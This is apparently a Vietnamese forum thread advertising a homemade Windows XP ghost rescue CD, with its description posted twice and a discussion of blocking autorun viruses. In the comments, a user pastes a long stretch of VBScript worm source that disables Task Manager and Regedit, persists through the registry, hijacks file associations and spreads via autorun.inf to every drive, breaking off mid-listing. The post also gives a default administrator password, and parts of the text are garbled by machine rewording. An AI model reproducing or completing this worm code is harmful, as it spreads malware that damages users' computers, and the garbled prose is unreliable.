NamPT Ghost CD – Đĩa Ghost tự nhận driver - 1 CD duy nhất - tích hợp khởi động DOS

NamPT Ghost CD (NGCD):

Tổng dung lượng dữ liệu khi burn ra đĩa: 682MB.

Dung lượng file ảnh ghost: 636MB.

Dung lượng Mini Windows XP: 39MB.

Dung lượng phần khởi động và MS-DOS: 4.5MB.

Cập nhật phiên bản mới lúc: 13h ngày 03/10/2009

1. Mô tả file ảnh ghost:

Tên file: NamPT.gho.

Dữ liệu bên trong file NamPT.gho:

- Hệ điều hành: Windows XP Professional SP2, mật (an ninh) khẩu Administrator: nampt.com, file system: NTFS, trong thư mục gốc có 1 file autorun.inf có dung lượng 0 byte chỉ có Administrator mới có quyền xóa, sửa, xem, dùng để chống lại virus gắn file autorun.inf mới vào ổ đĩa chứa hệ điều hành để điều hướng kích hoạt virus mỗi khi truy cập vào ổ đĩa này. Hệ điều hành vừa được tùy chỉnh để phụ hợp nhất cho (nhiều) đa số người sử dụng như: chức năng autorun chỉ hoạt động khi đưa ổ CD/DVD vào còn những ổ đĩa khác như ổ cứng, ổ gắn ngoài, ổ RAM,… đều không hiệu hóa chức năng autorun,… Các phần mềm vừa cài đặt trong hệ điều hành:

- IE8 – Trình duyệt Internet Explorer 8.

- K-Lite Codec Pack 2.34 – Mã và giải ngựa các định dạng nhạc thông dụng trên Windows.

- Microsoft Office 2003: Word, Excel, PowerPoint.

- Foxit Reader 3.1.1.901 – Mở file PDF.

- WinRAR 3.80 – Nén, giải nén các định dạng file nén thông dụng.

- Unikey 4.0 RC2 – Bộ gõ tiếng Việt Unikey mới nhất.

- Fonts: Cung cấp thêm 150 fonts TCVN3, font VNI-Times.

WOT for Internet Explorer - Phòng tránh virus khi lướt web.

- Antivirus: Để tiết kiệm dung lượng file ghost có thể đặt trong 1 CD duy nhất. Bộ cài chương trình diệt virus và các tiện ích kèm theo được tích hợp vào trong file ghost và tự động cài khi đăng nhập vào Windows lần đầu tiên. Tập hợp lệnh cài đặt được đặt trong 1 file .bat, được cài trả toàn tự động, bạn chỉ chuyện chờ đợi và tắt cửa sổ dòng lệnh khi có yêu cầu.

2. Mô tả Mini Windows XP:

Mini Windows XP được lấy từ Hirent’s Boot CD 10.0 dùng để Ghost lại hệ thống khi bạn ghost trong MS-DOS mà máy báo lỗi do nguyên nhân của máy chứ bất phải hỏng đĩa hay sao lưu dữ liệu khi cần ghost lại hệ thống hay làm những chuyện nào đó mà bạn muốn trên giao diện trực quan, thân thuộc của Windows XP nếu máy tính cần khắc phục bị lỗi bất vào được Windows. Để sử dụng được Mini Windows XP yêu cầu máy có tối thiểu 256MB RAM. Nếu bất muốn sử dụng Mini Windows XP hay không muốn burn ra 1 đĩa có dữ liệu chiếm hết dung lượng CD khiến xác suất hỏng CD sớm hơn thì bạn có thể bỏ phần này. Nó gồm 5 files nằm trong thư mục NGCD: XP, XP.BIN, XP.CA_, XP.DAT, XPLOADER.BIN. File XP.CA_ là file chính có dung lượng lớn nhất, 4 file còn lại có tổng dung lượng 343KB. Nếu thật sự bạn muốn xóa Mini Windows XP bạn hãy dùng UltraISO Premium Edition 9 mở và xóa để tránh mất tiềm năng khởi động của đĩa (địa chỉ download sẽ liệt kê sau).

3. Mô tả Phần khởi động CD và MS-DOS:

- Hỗ trợ khởi động từ đĩa cứng.

- Hỗ trợ khởi động MS-DOS từ CD.

- Hỗ trợ khởi động Mini Windows XP.

- Hỗ trợ phân tích bộ nhớ máy tính.

MS-DOS gồm các phần chính:

- One Click to ghost: Menu này là menu đầu tiên có tên: “Bung file ghost NamPT.gho trong CD-ROM vao partition 1 cua disk 1”, đây là chức năng chính nhất của NGCD, khi chọn menu này máy lập tức nạp chương trình và tiến hành ghost, ghost xong thì khởi động lại (nếu lúc này BIOS đang để chọn khởi động mặc định là ổ cứng thì đây là khoảng thời (gian) gian chờ đợi khá dài mà bạn bất phải làm gì cho đến khi bản Windows cài đặt xong). Tiến trình tự nhận driver bắt đầu từ lần khởi động lại này, sau khi nhận hết driver (desktop & laptop đều bình đẳng) máy sẽ khởi động lại và vào Windows.

- Menu thứ 2 là Norton Ghost 11.5: Chạy chương trình ghost theo cách thông thường.

- Menu thứ 3 là Partition Magic Pro 8.05: Chia ổ đĩa mới, chia ổ đĩa bất mất dữ liệu, sửa lỗi ổ đĩa, …

- Menu thứ tư là Chuyen phan vung khoi dong primary voi pqboot: Chức năng này thường bất sử dụng đến nếu ổ cứng của bạn chỉ có 1 phân vùng khởi động Primary.

- Menu thứ 5 là Active Password Changer 3.0.420 (NT/2000/XP/2003/Vista): Dùng để phá mật (an ninh) khẩu cho các user trong Windows khi tất cả user có quyền Administrators đều quên mật (an ninh) khẩu.

- Menu cuối cùng là MS-DOS: Khởi động 1 mình MS-DOS mà bất kèm khởi động 1 trong các chức năng ở trên.

Đây là 1 đĩa CD đầy đủ 1 cách tiết kiệm dung lượng nhất, từ lựa chọn các chương trình cài đặt vào Windows trong bản ghost, căn dung lượng file ghost, căn dung lượng ghi ra CD, khởi động từ CD, các chương trình sửa lỗi thông dụng cho máy tính. Ngoài ra MS-DOS trong CD này mặc định hỗ trợ nhận hầu hết các USB của các hãng nổi tiếng mà bất phải lựa chọn như Hirent's boot cd.

Đĩa CD này nhắm đến phục vụ cho cá nhân có thể tự sửa máy tính cho mình 1 cách dễ dàng, đơn giản, nhanh chóng, giao diện trả toàn bằng tiếng Việt. Đặc biệt hướng đến các kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính. Mọi thông tin Windows trong file ghost đều cố gắng bất định danh 1 ai cả.

4. Download:

- Để hỗ trợ download nhanh hơn bạn hãy cài chương trình IDM. Nếu máy bạn chưa cài IDM có thể download IDM 5.15 portable tại đây:

Sau khi download và kích hoạt IDM xong bạn lưu đường dẫn bài viết này lại:

và khởi động lại trình duyệt để trả thành chuyện tích hợp IDM vào trình duyệt.

Tiếp đó bạn download MediaFire Downloader 1.1.5.0 (MFD):

tiện ích này dùng để download hàng loạt fles theo danh sách, tất cả các file trong 1 link của thư mục,... từ trang mediafire.com. Download xong bạn cài đặt nó, quá trình cài đặt có thể đòi hỏi DotNetFrameWork, nếu bạn bất cài được theo chỉ dẫn của file cài đặt có thể vào đất chỉ sau để xem chỉ dẫn cách cài: . Sau khi vừa cài đặt xong bạn xem tiếp các chỉ dẫn bên dưới và copy các đường link vào MediaFire Downloader để thực hiện download tự động. Nếu phần mềm MediaFire Downloader này bất làm bạn hài lòng hãy comment lại, tui sẽ viết cho các bạn 1 phần mềm tương tự, trả thiện hơn, giao diện tiếng Việt để lần sau sử dụng.

- Download NamPT Ghost CD:

(link tạm thời) hoặc:

Đây là đất chỉ thư mục NamPTGhostCD. Khi vào đất chỉ này bạn sẽ thấy có 7 file .rar cần download. Bạn download lần lượt chúng (đừng đổi tên bất kỳ file nào). Sau khi vừa download hết bạn đặt chung vào 1 thư mục, rồi tiến hành giải nén. (Hướng dẫn trên dùng MFD thì bạn chỉ chuyện copy link của thư mục này vào MFD là nó tự nhận 7 file rar kia)

Nếu máy bạn chưa cài winrar có thể download winrar 3.80 tại đây:

chương trình winrar này tui nén bằng file .zip, file zip là loại file nén được Windows XP hỗ trợ sẵn nên bạn download về nhấp chuột phải vào nó chọn extract all… để giải nén rồi tiến hành cài đặt.

Tiến hành giải nén 7 file rar: Nhấp chuột phải vào 1 trong 7 file đó rồi chọn extract here. Giải nén xong ta được file NamPT Ghost CD.iso.

Nếu bạn bất muốn chỉnh sửa gì file này thì hãy burn ra đĩa CD. Hãy chọn 1 CD trắng loại thật tốt để burn, nguyên nhân là vì dung lượng file ghost trong CD chiếm hầu hết dung lượng CD, nếu loại CD bất được tốt lắm chỉ cần có 1 xước hay lỗi nhỏ ở phần dữ liệu file ghost này thì file ghost bị lỗi ngay và CD đó xem như vứt đi, thường CD bất tốt thì chỉ sử dụng được vài lần là vứt đĩa, nếu CD tốt thì khó xước đĩa hơn và nếu có xước thì có thể vẫn bất gây lỗi, mặt khác cd ghost này bất chỉ để cứu hộ cho máy tính của mình mà còn để cứu nhiều máy khác mà bất phải máy nào cũng có đầu đọc đĩa CD-ROM tốt cả.

Nếu bạn chưa cài chương trình burn đĩa nào hỗ trợ burn đĩa từ file .ISO hãy download và cài đặt chương trình UltraISO 9 premium edition, đất chỉ download:

Chương trình này cũng có thể sửa nội dung bên trong file .ISO mà bất làm mất tiềm năng boot từ CD như tui đã nói ở mục 2. Mô tả Mini Windows XP.

5. Chỉnh sửa nội dung bên trong NamPT Ghost CD.iso:

- Trường hợp 1: Để nguyên tất cả thứ, kiếm 1 CD trắng loại tốt, burn ra là bạn vừa có 1 đĩa ghost trả chỉnh.

- Trường hợp 2: Để giảm dung lượng burn ra CD bạn có thể hi sinh chức năng Mini Windows XP bằng cách dùng UltraISO để sửa như chỉ dẫn ở mục 2.

- Trường hợp 3: Nếu bạn là kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính, có thể thay thế ảnh trong file NamPT.gho có đất chỉ là C:\syspref\logo.bmp để được 1 đĩa ghost như ý, hiển thị thông tin của chính bạn bằng cách mở NamPT Ghost CD.iso bằng UltraISO rồi kéo thả file NamPT.gho ra đâu đó, sau đó dùng file ghostexp.exe:

để sửa file gho đó bằng cách mở file GhostExp.exe, nhấn Ctrl + O tìm đến file NamPT.gho vừa kéo thả ra ngoài.

Cửa số mới hiện ra và thay thế file logo.bmp như hình chỉ dẫn sau:

Chú ý: file logo.bmp có kích thước 800x600 pixels, mỗi lần kéo thả logo.bmp vào kích thước file gho sẽ tăng lên 469 KB.

Sau khi vừa kéo logo.bmp vào thì tắt hộp thoại này lại và tiến hành kéo thả NamPT.gho vào file NamPT Ghost CD.iso vừa mở trước đó bằng UltraISO và lưu lại là bạn sẽ được 1 bản ghost như chính bạn làm ra vậy mà bất mất nhiều thời (gian) gian.

Phan Thanh Nam

NamPT Ghost CD (NGCD):

Tổng dung lượng dữ liệu khi burn ra đĩa: 682MB.

Dung lượng file ảnh ghost: 636MB.

Dung lượng Mini Windows XP: 39MB.

Dung lượng phần khởi động và MS-DOS: 4.5MB.

Cập nhật phiên bản mới lúc: 13h ngày 03/10/2009

1. Mô tả file ảnh ghost:

Tên file: NamPT.gho.

Dữ liệu bên trong file NamPT.gho:

- Hệ điều hành: Windows XP Professional SP2, mật (an ninh) khẩu Administrator: nampt.com, file system: NTFS, trong thư mục gốc có 1 file autorun.inf có dung lượng 0 byte chỉ có Administrator mới có quyền xóa, sửa, xem, dùng để chống lại virus gắn file autorun.inf mới vào ổ đĩa chứa hệ điều hành để điều hướng kích hoạt virus mỗi khi truy cập vào ổ đĩa này. Hệ điều hành vừa được tùy chỉnh để phụ hợp nhất cho (nhiều) đa số người sử dụng như: chức năng autorun chỉ hoạt động khi đưa ổ CD/DVD vào còn những ổ đĩa khác như ổ cứng, ổ gắn ngoài, ổ RAM,… đều không hiệu hóa chức năng autorun,… Các phần mềm vừa cài đặt trong hệ điều hành:

- IE8 – Trình duyệt Internet Explorer 8.

- K-Lite Codec Pack 2.34 – Mã và giải ngựa các định dạng nhạc thông dụng trên Windows.

- Microsoft Office 2003: Word, Excel, PowerPoint.

- Foxit Reader 3.1.1.901 – Mở file PDF.

- WinRAR 3.80 – Nén, giải nén các định dạng file nén thông dụng.

- Unikey 4.0 RC2 – Bộ gõ tiếng Việt Unikey mới nhất.

- Fonts: Cung cấp thêm 150 fonts TCVN3, font VNI-Times.

WOT for Internet Explorer - Phòng tránh virus khi lướt web.

- Antivirus: Để tiết kiệm dung lượng file ghost có thể đặt trong 1 CD duy nhất. Bộ cài chương trình diệt virus và các tiện ích kèm theo được tích hợp vào trong file ghost và tự động cài khi đăng nhập vào Windows lần đầu tiên. Tập hợp lệnh cài đặt được đặt trong 1 file .bat, được cài trả toàn tự động, bạn chỉ chuyện chờ đợi và tắt cửa sổ dòng lệnh khi có yêu cầu.

2. Mô tả Mini Windows XP:

Mini Windows XP được lấy từ Hirent’s Boot CD 10.0 dùng để Ghost lại hệ thống khi bạn ghost trong MS-DOS mà máy báo lỗi do nguyên nhân của máy chứ bất phải hỏng đĩa hay sao lưu dữ liệu khi cần ghost lại hệ thống hay làm những chuyện nào đó mà bạn muốn trên giao diện trực quan, thân thuộc của Windows XP nếu máy tính cần khắc phục bị lỗi bất vào được Windows. Để sử dụng được Mini Windows XP yêu cầu máy có tối thiểu 256MB RAM. Nếu bất muốn sử dụng Mini Windows XP hay không muốn burn ra 1 đĩa có dữ liệu chiếm hết dung lượng CD khiến xác suất hỏng CD sớm hơn thì bạn có thể bỏ phần này. Nó gồm 5 files nằm trong thư mục NGCD: XP, XP.BIN, XP.CA_, XP.DAT, XPLOADER.BIN. File XP.CA_ là file chính có dung lượng lớn nhất, 4 file còn lại có tổng dung lượng 343KB. Nếu thật sự bạn muốn xóa Mini Windows XP bạn hãy dùng UltraISO Premium Edition 9 mở và xóa để tránh mất tiềm năng khởi động của đĩa (địa chỉ download sẽ liệt kê sau).

3. Mô tả Phần khởi động CD và MS-DOS:

- Hỗ trợ khởi động từ đĩa cứng.

- Hỗ trợ khởi động MS-DOS từ CD.

- Hỗ trợ khởi động Mini Windows XP.

- Hỗ trợ phân tích bộ nhớ máy tính.

MS-DOS gồm các phần chính:

- One Click to ghost: Menu này là menu đầu tiên có tên: “Bung file ghost NamPT.gho trong CD-ROM vao partition 1 cua disk 1”, đây là chức năng chính nhất của NGCD, khi chọn menu này máy lập tức nạp chương trình và tiến hành ghost, ghost xong thì khởi động lại (nếu lúc này BIOS đang để chọn khởi động mặc định là ổ cứng thì đây là khoảng thời (gian) gian chờ đợi khá dài mà bạn bất phải làm gì cho đến khi bản Windows cài đặt xong). Tiến trình tự nhận driver bắt đầu từ lần khởi động lại này, sau khi nhận hết driver (desktop & laptop đều bình đẳng) máy sẽ khởi động lại và vào Windows.

- Menu thứ 2 là Norton Ghost 11.5: Chạy chương trình ghost theo cách thông thường.

- Menu thứ 3 là Partition Magic Pro 8.05: Chia ổ đĩa mới, chia ổ đĩa bất mất dữ liệu, sửa lỗi ổ đĩa, …

- Menu thứ tư là Chuyen phan vung khoi dong primary voi pqboot: Chức năng này thường bất sử dụng đến nếu ổ cứng của bạn chỉ có 1 phân vùng khởi động Primary.

- Menu thứ 5 là Active Password Changer 3.0.420 (NT/2000/XP/2003/Vista): Dùng để phá mật (an ninh) khẩu cho các user trong Windows khi tất cả user có quyền Administrators đều quên mật (an ninh) khẩu.

- Menu cuối cùng là MS-DOS: Khởi động 1 mình MS-DOS mà bất kèm khởi động 1 trong các chức năng ở trên.

Đây là 1 đĩa CD đầy đủ 1 cách tiết kiệm dung lượng nhất, từ lựa chọn các chương trình cài đặt vào Windows trong bản ghost, căn dung lượng file ghost, căn dung lượng ghi ra CD, khởi động từ CD, các chương trình sửa lỗi thông dụng cho máy tính. Ngoài ra MS-DOS trong CD này mặc định hỗ trợ nhận hầu hết các USB của các hãng nổi tiếng mà bất phải lựa chọn như Hirent's boot cd.

Đĩa CD này nhắm đến phục vụ cho cá nhân có thể tự sửa máy tính cho mình 1 cách dễ dàng, đơn giản, nhanh chóng, giao diện trả toàn bằng tiếng Việt. Đặc biệt hướng đến các kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính. Mọi thông tin Windows trong file ghost đều cố gắng bất định danh 1 ai cả.

4. Download:

- Để hỗ trợ download nhanh hơn bạn hãy cài chương trình IDM. Nếu máy bạn chưa cài IDM có thể download IDM 5.15 portable tại đây:

Sau khi download và kích hoạt IDM xong bạn lưu đường dẫn bài viết này lại:

và khởi động lại trình duyệt để trả thành chuyện tích hợp IDM vào trình duyệt.

Tiếp đó bạn download MediaFire Downloader 1.1.5.0 (MFD):

tiện ích này dùng để download hàng loạt fles theo danh sách, tất cả các file trong 1 link của thư mục,... từ trang mediafire.com. Download xong bạn cài đặt nó, quá trình cài đặt có thể đòi hỏi DotNetFrameWork, nếu bạn bất cài được theo chỉ dẫn của file cài đặt có thể vào đất chỉ sau để xem chỉ dẫn cách cài: . Sau khi vừa cài đặt xong bạn xem tiếp các chỉ dẫn bên dưới và copy các đường link vào MediaFire Downloader để thực hiện download tự động. Nếu phần mềm MediaFire Downloader này bất làm bạn hài lòng hãy comment lại, tui sẽ viết cho các bạn 1 phần mềm tương tự, trả thiện hơn, giao diện tiếng Việt để lần sau sử dụng.

- Download NamPT Ghost CD:

(link tạm thời) hoặc:

Đây là đất chỉ thư mục NamPTGhostCD. Khi vào đất chỉ này bạn sẽ thấy có 7 file .rar cần download. Bạn download lần lượt chúng (đừng đổi tên bất kỳ file nào). Sau khi vừa download hết bạn đặt chung vào 1 thư mục, rồi tiến hành giải nén. (Hướng dẫn trên dùng MFD thì bạn chỉ chuyện copy link của thư mục này vào MFD là nó tự nhận 7 file rar kia)

Nếu máy bạn chưa cài winrar có thể download winrar 3.80 tại đây:

chương trình winrar này tui nén bằng file .zip, file zip là loại file nén được Windows XP hỗ trợ sẵn nên bạn download về nhấp chuột phải vào nó chọn extract all… để giải nén rồi tiến hành cài đặt.

Tiến hành giải nén 7 file rar: Nhấp chuột phải vào 1 trong 7 file đó rồi chọn extract here. Giải nén xong ta được file NamPT Ghost CD.iso.

Nếu bạn bất muốn chỉnh sửa gì file này thì hãy burn ra đĩa CD. Hãy chọn 1 CD trắng loại thật tốt để burn, nguyên nhân là vì dung lượng file ghost trong CD chiếm hầu hết dung lượng CD, nếu loại CD bất được tốt lắm chỉ cần có 1 xước hay lỗi nhỏ ở phần dữ liệu file ghost này thì file ghost bị lỗi ngay và CD đó xem như vứt đi, thường CD bất tốt thì chỉ sử dụng được vài lần là vứt đĩa, nếu CD tốt thì khó xước đĩa hơn và nếu có xước thì có thể vẫn bất gây lỗi, mặt khác cd ghost này bất chỉ để cứu hộ cho máy tính của mình mà còn để cứu nhiều máy khác mà bất phải máy nào cũng có đầu đọc đĩa CD-ROM tốt cả.

Nếu bạn chưa cài chương trình burn đĩa nào hỗ trợ burn đĩa từ file .ISO hãy download và cài đặt chương trình UltraISO 9 premium edition, đất chỉ download:

Chương trình này cũng có thể sửa nội dung bên trong file .ISO mà bất làm mất tiềm năng boot từ CD như tui đã nói ở mục 2. Mô tả Mini Windows XP.

5. Chỉnh sửa nội dung bên trong NamPT Ghost CD.iso:

- Trường hợp 1: Để nguyên tất cả thứ, kiếm 1 CD trắng loại tốt, burn ra là bạn vừa có 1 đĩa ghost trả chỉnh.

- Trường hợp 2: Để giảm dung lượng burn ra CD bạn có thể hi sinh chức năng Mini Windows XP bằng cách dùng UltraISO để sửa như chỉ dẫn ở mục 2.

- Trường hợp 3: Nếu bạn là kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính, có thể thay thế ảnh trong file NamPT.gho có đất chỉ là C:\syspref\logo.bmp để được 1 đĩa ghost như ý, hiển thị thông tin của chính bạn bằng cách mở NamPT Ghost CD.iso bằng UltraISO rồi kéo thả file NamPT.gho ra đâu đó, sau đó dùng file ghostexp.exe:

để sửa file gho đó bằng cách mở file GhostExp.exe, nhấn Ctrl + O tìm đến file NamPT.gho vừa kéo thả ra ngoài.

Cửa số mới hiện ra và thay thế file logo.bmp như hình chỉ dẫn sau:

Chú ý: file logo.bmp có kích thước 800x600 pixels, mỗi lần kéo thả logo.bmp vào kích thước file gho sẽ tăng lên 469 KB.

Sau khi vừa kéo logo.bmp vào thì tắt hộp thoại này lại và tiến hành kéo thả NamPT.gho vào file NamPT Ghost CD.iso vừa mở trước đó bằng UltraISO và lưu lại là bạn sẽ được 1 bản ghost như chính bạn làm ra vậy mà bất mất nhiều thời (gian) gian.

Phan Thanh Nam

Down phát đầu tiên mở hàng nào!

Thank bác vừa sẻ chia và hưỡng dẫn chi tiết!

Thank anh chimboica nhiều.không biết nó có nhận Dual Core bất anh

Nhận hết, bios nhận là nó nhận. )

Bạn ơi,cái link số 3 die rồi

Trước tiên cũng rất Thank bác vừa sẻ chia, xong bác nói là nhận tất cả các drivers cho cả laptop và desktop với dung lượng bản ghost chỉ có 1 CD thì nghi ngờ quá. Hơn nữa, cách xử lý là làm ra (tạo) 1 file autorun.inf để chống lại virus autorun thì có vẻ bác theo cảm tính quá. Chẳng lẽ con virus đó nó lại bất tính đến chuyện bác dùng CACLS để đặt thuộc tính cho nó? Quyền Admin có bằng quyền System không? Nếu làm ra (tạo) file autorun.inf thì bất qua mặt được nó đâu bác ạ. Tất nhiên cũng có cách nhưng phải là làm ra (tạo) thư mục autorun.inf và trong thư mục đó cần xử lý thêm nữa.

Bạn ơi, không biết bạn có cách gì để modified/delete file autorun.inf đó. Có thì cũng tốt, post lên cho anh em học hỏi. Mình không dùng cacls (ko biết viết thế có đúng ko) như chỉ dẫn trên mạng bạn ạ. Trên mạng chỉ chỉ dẫn cacls với everyone chứ mình login vào chính tài khoản administrator rồi làm ra (tạo) file autorun.inf, deny full control cho tất cả các groups: Administrators, Authenticated Users, SYSTEM, Users, ngoại trừ user: Administrator. Điểm nhấn của nó là login vào administrator rồi làm ra (tạo) file và sửa quuyền truy cập ở đây chứ không phải thao tác trên user đang sử dụng. Administrator thì mình không bao giờ sử dụng để làm các chuyện thông thường. Nếu virus muốn modified/delete thì phải biết mật (an ninh) khẩu administrator, mật (an ninh) khẩu thì mình vừa cài đặt (nampt.com) chứ bất phải để trống.

Còn cái bạn nghi ngờ về driver là trả toàn đúng. Nó bất thể nhận được tất cả driver cho tất cả máy tính, nhưng những máy tính đang còn tại và bạn gặp nó hàng ngày thì % nhận được driver là rất cao, mình vừa làm nhiều bản ghost phụ thuộc trên bộ driver này và chưa máy tính nào nhận thiếu driver, ngoại trừ các tiện ích điều khiển tốc độ CPU, touchpad và driver bluetooth cho laptop.

Quả thật những vấn đề nghi ngờ của bạn là rất hay mình liệt vào good question, có thế mình mới có thời cơ nhớ ra và đưa lên mạng thêm 1 số cách riêng để tất cả người tham tiềmo

[=========> Bổ sung bài viết <=========]

Quote:

Được gửi bởi hoa_hong_da3

Bạn ơi,cái link số 3 die rồi

Mình vừa test kỹ, bất có cái link nào die cả. Bạn hãy xóa cookie của trình duyệt hay khởi động lại máy hay cả 2 thì sẽ download được link 3 đó. hay cách đơn giản hơn là đổi trình duyệt để download link 3 đó.

Tạo folder autorun.inf để làm giả autorun thì có thể dùng cacls hay có thể làm ra (tạo) một sub folder tên "con" trong folder autorun.inf. Nhưng mấy cách mình biết trên chắc cổ lổ xỉ và virus nó "biết" hết rồi, các bạn có cách tốt hơn mong được chia sẽ
Còn về driver thì chủ yếu là driver "phổ thông" để có thể tạm thời (gian) vào windows suôn sẽ (ví dụ driver ethernet chẳng hạn) nếu có thể lên mạng được thì có thể tải các driver chính thức của thiết bị/laptop đó rồi. Dù sao đây cũng là đĩa cứu hộ chứ đâu phải là đĩa tập hợp driver đâu

Bạn ơi Thank vì sẻ chia

Nhưng đĩa này mình cũng vừa tự làm rồi nhận Driver rất ngon nhưng máy chạy tốn nhiều tài nguyên hệ thống lắm bất bằng Driver chính của Main

Tại sao làm ra (tạo) thư mục AUTORUN.INF rồi xử lý thêm 1 thư mục bên trong nó nữa lại bất được nhỉ? Bác vừa test thử chưa? Kể cả dùng thằng Unlocker cũng bó tay với nó đấy.
Còn đây là code của virus, các bạn coi thử xem, tui sưu tầm được thôi:

on Error Resume Next
Dim Fso,WshShell
Set Fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
Call Main()
Sub Main()
on Error Resume Next
Dim Args, VirusLoad, VirusAss
Set Args = WScript.Arguments
VirusLoad = GetMainVirus(1)
VirusAss = GetMainVirus(0)
ArgNum = 0
Do While ArgNum < Args.Count
Param = Param & " " & Args(ArgNum)
ArgNum = ArgNum + 1
Loop
SubParam = LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath = Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "bat", "cmd"
RunPath = "CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "reg"
RunPath = "regedit.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "chm"
RunPath = "hh.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "hlp"
RunPath = "winhlp32.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "dir"
RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "oie"
RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "omc"
RunPath = "explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "emc"
RunPath = "explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case Else
If PreDblInstance = True Then
WScript.Quit
End If
Timeout = DateDiff("ww", GetInfectedDate, Date) - 12
If Timeout > 0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
Call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
on Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames = Array("taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe")
VBSFullNames = Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
on Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
phiên bản = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 or Drive.DriveType = 2 or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath) = False or FSO.FileExists(VirusLoadPath) = False or FSO.FileExists(HostFilePath) = False or GetVersion() < phiên bản Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < phiên bản Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfi le\shell\open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifi le\shell\open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffi le\shell\open\command\") <> File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfi le\shell\open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
